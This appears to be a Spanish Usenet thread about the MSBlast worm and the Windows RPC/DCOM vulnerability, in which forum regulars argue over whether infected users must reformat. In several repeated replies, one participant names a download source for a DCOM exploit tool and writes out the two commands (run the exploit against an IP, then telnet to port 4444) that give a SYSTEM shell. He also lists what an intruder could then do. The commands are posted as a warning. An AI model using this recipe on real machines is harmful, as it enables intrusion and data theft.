VIVIR con la duda

Negativo ...que hace una aplicación EXE, BAT, COM, etc. que nunca va a correr porque nunca va a ser
llamada por el SO?
R/ Nada.
Ese archivo (o esa clave del registro) puede estar forever en la PC sin causar daño alguno. Tu sabes
que es así.

Otra variante del "virus" sería sustituir una aplicación o DLL (hasta un archivo HLP) que va a ser
referenciado ahora por un programa que generalmente usamos. Ej. Microsoft Word.
...o abrimos el OE y lo que estamos abriendo es un troyano que nos abre luego el OE y no notamos
nada.
PERO, esto ya no es un virus sino una intrusión a tu PC "person to person" en la que requiere un
individuo dedicado a tu PC y con un objetivo personal, hackear TU ordenador. Crees tu que esta
avalancha de problemas se debe a una asociación de hacker que decidieron darse a conocer justo el
día de ayer?
R/ No, esto es solo un virus con las mismas características y el mismo código para todos los
afectados. Por tanto la solución es común para todos y así se está tratando en los grupos de habla
inglesa.

CONCLUSIÓN: Busquemos la mejor herramienta para eliminarlo y bueno, el que sepa rezar no está de
más. Luego... a dormir tranquilos.

Saludos,



"JM Tella Llop [MS MVP] ·" wrote in message
news:
el gidsano se elemina con la minga.. pero el resto de cosas que te hayan podido hacer cualquier
mindundi,,,,, no.

O sea... que formateas o vivirás siempre con la duda.

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.





"semecuelga" wrote in message
news:

Lo que hay que vivir con la duda de si era necesario crear tanto pánico y sugerir formatear como
único recurso.
http://www.bigblackglasses.com/Arti...?Article42

Otra duda será, por qué es tan grande el parche de Microsoft? te empujarán otras cositas?????

http://microsoft.com/downloads/deta...2-3DE40F69

C074

Take it easy,



"Antonio Amengual MSMVP" <amengualserraatono.com> wrote in message
news:
> a todos los que han sido victimas o "clientes" del RPC y el msblast y han
> decidido aplicar lo posteado en vsantivirus
> no os queda un resquemor en el agujero del culo?, que otra cosa mas me han
> metido?
> me habrán borrado las fotos de la Lolita en bolas o las del pocholo en
> cueros?
> personalmente no he sido victima de nada de esto, hago mis deberes y digo
> amén a wupdate cando me avisa que hay cosas pendtes de instalar
> tambien renuevo mi permiso de conducir cuando toca
> pero eso de vivir con la duda de que alguien me ha colado algo que
> renombrado puede organizar un trifostio del copón; sinceramente no seria
> capáz
> y eso que mi pc se pasa mas de 18 horas encendido los 7 dias de la semana
>
>
>
>
>
> Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no
> otorga ningún derecho.
>
> This posting is provided "AS IS" with no warranties, and confers no rights.
> You assume all risk for your use.
>
>
>
>
> XP Pro-2600-limpia+SP1
>
> por favor
> respuestas al grupo; asi nos beneficiamos todos
> no se responde personalmente
>
> saludos
>
> Antonio
> ms mvp windows
>
>

pero joder a ver si nos enteramos el virus no es preocupante. Simplemente usa una vulnerabilidad que puedo usar yo tambien. Me descargo el programa dcom_final de http://cyruxnet.com.ar/rpcxploit2.htm#windows lo ejecuto así:

dcom 1 xxx.yyy.zzz.ttt

siendo esa una direccio IP, por ejemplo la tuya. A continuacion ejecuto:

telnet xxx.yyy.zzz.tttt 4444

y ya está, ahora estoy en ti maquina en una sesion de comandos, con el usuario Local System (mas atributos que el administrador).. y sin que tu te enteres te hago lo que quieras..

* te puedo meter un troyanito (echo a medida para que ningun antivirus lo pille) para tomar control de tu maquina cuando quiera..
* Dejarte unas carpetas con prono, protegerlas para que NO pueda verlas nadie. ni el Administrdor y preparar redistirbucion de porno.
* Llevarme tus documentos y correo,...

en fin, lo que me de la gana...

Ahora... dime ¿tu solucion tiene algo que ver con este problema, que es el problema real?...

No me jodais y documentaros primero coño!!!!

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.





"semecuelga" wrote in message news:Ob$

Negativo ...que hace una aplicación EXE, BAT, COM, etc. que nunca va a correr porque nunca va a ser
llamada por el SO?
R/ Nada.
Ese archivo (o esa clave del registro) puede estar forever en la PC sin causar daño alguno. Tu sabes
que es así.

Otra variante del "virus" sería sustituir una aplicación o DLL (hasta un archivo HLP) que va a ser
referenciado ahora por un programa que generalmente usamos. Ej. Microsoft Word.
...o abrimos el OE y lo que estamos abriendo es un troyano que nos abre luego el OE y no notamos
nada.
PERO, esto ya no es un virus sino una intrusión a tu PC "person to person" en la que requiere un
individuo dedicado a tu PC y con un objetivo personal, hackear TU ordenador. Crees tu que esta
avalancha de problemas se debe a una asociación de hacker que decidieron darse a conocer justo el
día de ayer?
R/ No, esto es solo un virus con las mismas características y el mismo código para todos los
afectados. Por tanto la solución es común para todos y así se está tratando en los grupos de habla
inglesa.

CONCLUSIÓN: Busquemos la mejor herramienta para eliminarlo y bueno, el que sepa rezar no está de
más. Luego... a dormir tranquilos.

Saludos,



"JM Tella Llop [MS MVP] ·" wrote in message
news:
el gidsano se elemina con la minga.. pero el resto de cosas que te hayan podido hacer cualquier
mindundi,,,,, no.

O sea... que formateas o vivirás siempre con la duda.

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.





"semecuelga" wrote in message
news:
> Lo que hay que vivir con la duda de si era necesario crear tanto pánico y sugerir formatear como
> único recurso.
> http://www.bigblackglasses.com/Arti...?Article42
>
> Otra duda será, por qué es tan grande el parche de Microsoft? te empujarán otras cositas?????
>
http://microsoft.com/downloads/deta...2-3DE40F69
> C074
>
> Take it easy,
>
>
>
> "Antonio Amengual MSMVP" <amengualserraatono.com> wrote in message
> news:
> > a todos los que han sido victimas o "clientes" del RPC y el msblast y han
> > decidido aplicar lo posteado en vsantivirus
> > no os queda un resquemor en el agujero del culo?, que otra cosa mas me han
> > metido?
> > me habrán borrado las fotos de la Lolita en bolas o las del pocholo en
> > cueros?
> > personalmente no he sido victima de nada de esto, hago mis deberes y digo
> > amén a wupdate cando me avisa que hay cosas pendtes de instalar
> > tambien renuevo mi permiso de conducir cuando toca
> > pero eso de vivir con la duda de que alguien me ha colado algo que
> > renombrado puede organizar un trifostio del copón; sinceramente no seria
> > capáz
> > y eso que mi pc se pasa mas de 18 horas encendido los 7 dias de la semana
> >
> >
> >
> >
> >
> > Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no
> > otorga ningún derecho.
> >
> > This posting is provided "AS IS" with no warranties, and confers no rights.
> > You assume all risk for your use.
> >
> >
> >
> >
> > XP Pro-2600-limpia+SP1
> >
> > por favor
> > respuestas al grupo; asi nos beneficiamos todos
> > no se responde personalmente
> >
> > saludos
> >
> > Antonio
> > ms mvp windows
> >
> >
>
>
>
>

Repito, requiere que TU uses de tu tiempo y en lugar de poner el MSBlaster.exe (o como se llame) me
pongas otra cosa. Para esto se requiere tiempo y no puede haber millones de japoneses en estos
momentos tratando de reventar las PC de todo el planeta poniendo cositas diferentes en cada PC.
Yo no estoy discutiendo si se puede o no se puede hacer. Hay miles de mensajes que prueban que se
puede hacer y que de hecho se hizo.
Si tienes el MSBlaster.exe en tu PC puedes estar tranquilo porque tienes la versión publica del
virus. De lo contrario tienes la versión personal y posiblemente nunca te enteres que fuiste
invadido. Dado mi punto de vista primero deberían formatear los que no hallan notado nada ;-)))

Saludos,



"JM Tella Llop [MS MVP] ·" wrote in message
news:
pero joder a ver si nos enteramos el virus no es preocupante. Simplemente usa una
vulnerabilidad que puedo usar yo tambien. Me descargo el programa dcom_final de
http://cyruxnet.com.ar/rpcxploit2.htm#windows lo ejecuto así:

dcom 1 xxx.yyy.zzz.ttt

siendo esa una direccio IP, por ejemplo la tuya. A continuacion ejecuto:

telnet xxx.yyy.zzz.tttt 4444

y ya está, ahora estoy en ti maquina en una sesion de comandos, con el usuario Local System (mas
atributos que el administrador).. y sin que tu te enteres te hago lo que quieras..

* te puedo meter un troyanito (echo a medida para que ningun antivirus lo pille) para tomar control
de tu maquina cuando quiera..
* Dejarte unas carpetas con prono, protegerlas para que NO pueda verlas nadie. ni el
Administrdor y preparar redistirbucion de porno.
* Llevarme tus documentos y correo,...

en fin, lo que me de la gana...

Ahora... dime ¿tu solucion tiene algo que ver con este problema, que es el problema real?...

No me jodais y documentaros primero coño!!!!

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.





"semecuelga" wrote in message
news:Ob$

Negativo ...que hace una aplicación EXE, BAT, COM, etc. que nunca va a correr porque nunca va a

ser

llamada por el SO?
R/ Nada.
Ese archivo (o esa clave del registro) puede estar forever en la PC sin causar daño alguno. Tu

sabes

que es así.

Otra variante del "virus" sería sustituir una aplicación o DLL (hasta un archivo HLP) que va a ser
referenciado ahora por un programa que generalmente usamos. Ej. Microsoft Word.
...o abrimos el OE y lo que estamos abriendo es un troyano que nos abre luego el OE y no notamos
nada.
PERO, esto ya no es un virus sino una intrusión a tu PC "person to person" en la que requiere un
individuo dedicado a tu PC y con un objetivo personal, hackear TU ordenador. Crees tu que esta
avalancha de problemas se debe a una asociación de hacker que decidieron darse a conocer justo el
día de ayer?
R/ No, esto es solo un virus con las mismas características y el mismo código para todos los
afectados. Por tanto la solución es común para todos y así se está tratando en los grupos de habla
inglesa.

CONCLUSIÓN: Busquemos la mejor herramienta para eliminarlo y bueno, el que sepa rezar no está de
más. Luego... a dormir tranquilos.

Saludos,



"JM Tella Llop [MS MVP] ·" wrote in message
news:
el gidsano se elemina con la minga.. pero el resto de cosas que te hayan podido hacer

cualquier

mindundi,,,,, no.

O sea... que formateas o vivirás siempre con la duda.

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún

derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.





"semecuelga" wrote in message
news:
> Lo que hay que vivir con la duda de si era necesario crear tanto pánico y sugerir formatear como
> único recurso.
> http://www.bigblackglasses.com/Arti...?Article42
>
> Otra duda será, por qué es tan grande el parche de Microsoft? te empujarán otras

cositas?????

>

http://microsoft.com/downloads/deta...2-3DE40F69

> C074
>
> Take it easy,
>
>
>
> "Antonio Amengual MSMVP" <amengualserraatono.com> wrote in message
> news:
> > a todos los que han sido victimas o "clientes" del RPC y el msblast y han
> > decidido aplicar lo posteado en vsantivirus
> > no os queda un resquemor en el agujero del culo?, que otra cosa mas me han
> > metido?
> > me habrán borrado las fotos de la Lolita en bolas o las del pocholo en
> > cueros?
> > personalmente no he sido victima de nada de esto, hago mis deberes y digo
> > amén a wupdate cando me avisa que hay cosas pendtes de instalar
> > tambien renuevo mi permiso de conducir cuando toca
> > pero eso de vivir con la duda de que alguien me ha colado algo que
> > renombrado puede organizar un trifostio del copón; sinceramente no seria
> > capáz
> > y eso que mi pc se pasa mas de 18 horas encendido los 7 dias de la semana
> >
> >
> >
> >
> >
> > Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no
> > otorga ningún derecho.
> >
> > This posting is provided "AS IS" with no warranties, and confers no rights.
> > You assume all risk for your use.
> >
> >
> >
> >
> > XP Pro-2600-limpia+SP1
> >
> > por favor
> > respuestas al grupo; asi nos beneficiamos todos
> > no se responde personalmente
> >
> > saludos
> >
> > Antonio
> > ms mvp windows
> >
> >
>
>
>
>

que no pongo nada, que no tengo nada que hacer joder!!!!... que te abro una sesion con telnet y tu maquina ya es mia !!!!

Por favor pasate por es.comp.hackers... todos los niñatos de la red están probando con esto y otras decenas de chorradas

No quitar importancia a lo que relamente la tiene... y no se la deis a la mierda de gusano ese que se quita con la mirada!!!.
Se quita a mano con minimos conocimientos de windows y del registro. Lo otro es lo REALMENTE peligroso.

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.





"semecuelga" wrote in message news:

Repito, requiere que TU uses de tu tiempo y en lugar de poner el MSBlaster.exe (o como se llame) me
pongas otra cosa. Para esto se requiere tiempo y no puede haber millones de japoneses en estos
momentos tratando de reventar las PC de todo el planeta poniendo cositas diferentes en cada PC.
Yo no estoy discutiendo si se puede o no se puede hacer. Hay miles de mensajes que prueban que se
puede hacer y que de hecho se hizo.
Si tienes el MSBlaster.exe en tu PC puedes estar tranquilo porque tienes la versión publica del
virus. De lo contrario tienes la versión personal y posiblemente nunca te enteres que fuiste
invadido. Dado mi punto de vista primero deberían formatear los que no hallan notado nada ;-)))

Saludos,



"JM Tella Llop [MS MVP] ·" wrote in message
news:
pero joder a ver si nos enteramos el virus no es preocupante. Simplemente usa una
vulnerabilidad que puedo usar yo tambien. Me descargo el programa dcom_final de
http://cyruxnet.com.ar/rpcxploit2.htm#windows lo ejecuto así:

dcom 1 xxx.yyy.zzz.ttt

siendo esa una direccio IP, por ejemplo la tuya. A continuacion ejecuto:

telnet xxx.yyy.zzz.tttt 4444

y ya está, ahora estoy en ti maquina en una sesion de comandos, con el usuario Local System (mas
atributos que el administrador).. y sin que tu te enteres te hago lo que quieras..

* te puedo meter un troyanito (echo a medida para que ningun antivirus lo pille) para tomar control
de tu maquina cuando quiera..
* Dejarte unas carpetas con prono, protegerlas para que NO pueda verlas nadie. ni el
Administrdor y preparar redistirbucion de porno.
* Llevarme tus documentos y correo,...

en fin, lo que me de la gana...

Ahora... dime ¿tu solucion tiene algo que ver con este problema, que es el problema real?...

No me jodais y documentaros primero coño!!!!

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.





"semecuelga" wrote in message
news:Ob$
> Negativo ...que hace una aplicación EXE, BAT, COM, etc. que nunca va a correr porque nunca va a
ser
> llamada por el SO?
> R/ Nada.
> Ese archivo (o esa clave del registro) puede estar forever en la PC sin causar daño alguno. Tu
sabes
> que es así.
>
> Otra variante del "virus" sería sustituir una aplicación o DLL (hasta un archivo HLP) que va a ser
> referenciado ahora por un programa que generalmente usamos. Ej. Microsoft Word.
> ...o abrimos el OE y lo que estamos abriendo es un troyano que nos abre luego el OE y no notamos
> nada.
> PERO, esto ya no es un virus sino una intrusión a tu PC "person to person" en la que requiere un
> individuo dedicado a tu PC y con un objetivo personal, hackear TU ordenador. Crees tu que esta
> avalancha de problemas se debe a una asociación de hacker que decidieron darse a conocer justo el
> día de ayer?
> R/ No, esto es solo un virus con las mismas características y el mismo código para todos los
> afectados. Por tanto la solución es común para todos y así se está tratando en los grupos de habla
> inglesa.
>
> CONCLUSIÓN: Busquemos la mejor herramienta para eliminarlo y bueno, el que sepa rezar no está de
> más. Luego... a dormir tranquilos.
>
> Saludos,
>
>
>
> "JM Tella Llop [MS MVP] ·" wrote in message
> news:
> el gidsano se elemina con la minga.. pero el resto de cosas que te hayan podido hacer
cualquier
> mindundi,,,,, no.
>
> O sea... que formateas o vivirás siempre con la duda.
>
> Jose Manuel Tella Llop
> MS MVP - DTS
>
>
> Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún
derecho.
>
> This posting is provided "AS IS" with no warranties, and confers no rights.
> You assume all risk for your use.
>
>
>
>
>
> "semecuelga" wrote in message
> news:
> > Lo que hay que vivir con la duda de si era necesario crear tanto pánico y sugerir formatear como
> > único recurso.
> > http://www.bigblackglasses.com/Arti...?Article42
> >
> > Otra duda será, por qué es tan grande el parche de Microsoft? te empujarán otras
cositas?????
> >
>
http://microsoft.com/downloads/deta...2-3DE40F69
> > C074
> >
> > Take it easy,
> >
> >
> >
> > "Antonio Amengual MSMVP" <amengualserraatono.com> wrote in message
> > news:
> > > a todos los que han sido victimas o "clientes" del RPC y el msblast y han
> > > decidido aplicar lo posteado en vsantivirus
> > > no os queda un resquemor en el agujero del culo?, que otra cosa mas me han
> > > metido?
> > > me habrán borrado las fotos de la Lolita en bolas o las del pocholo en
> > > cueros?
> > > personalmente no he sido victima de nada de esto, hago mis deberes y digo
> > > amén a wupdate cando me avisa que hay cosas pendtes de instalar
> > > tambien renuevo mi permiso de conducir cuando toca
> > > pero eso de vivir con la duda de que alguien me ha colado algo que
> > > renombrado puede organizar un trifostio del copón; sinceramente no seria
> > > capáz
> > > y eso que mi pc se pasa mas de 18 horas encendido los 7 dias de la semana
> > >
> > >
> > >
> > >
> > >
> > > Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no
> > > otorga ningún derecho.
> > >
> > > This posting is provided "AS IS" with no warranties, and confers no rights.
> > > You assume all risk for your use.
> > >
> > >
> > >
> > >
> > > XP Pro-2600-limpia+SP1
> > >
> > > por favor
> > > respuestas al grupo; asi nos beneficiamos todos
> > > no se responde personalmente
> > >
> > > saludos
> > >
> > > Antonio
> > > ms mvp windows
> > >
> > >
> >
> >
> >
> >
>
>
>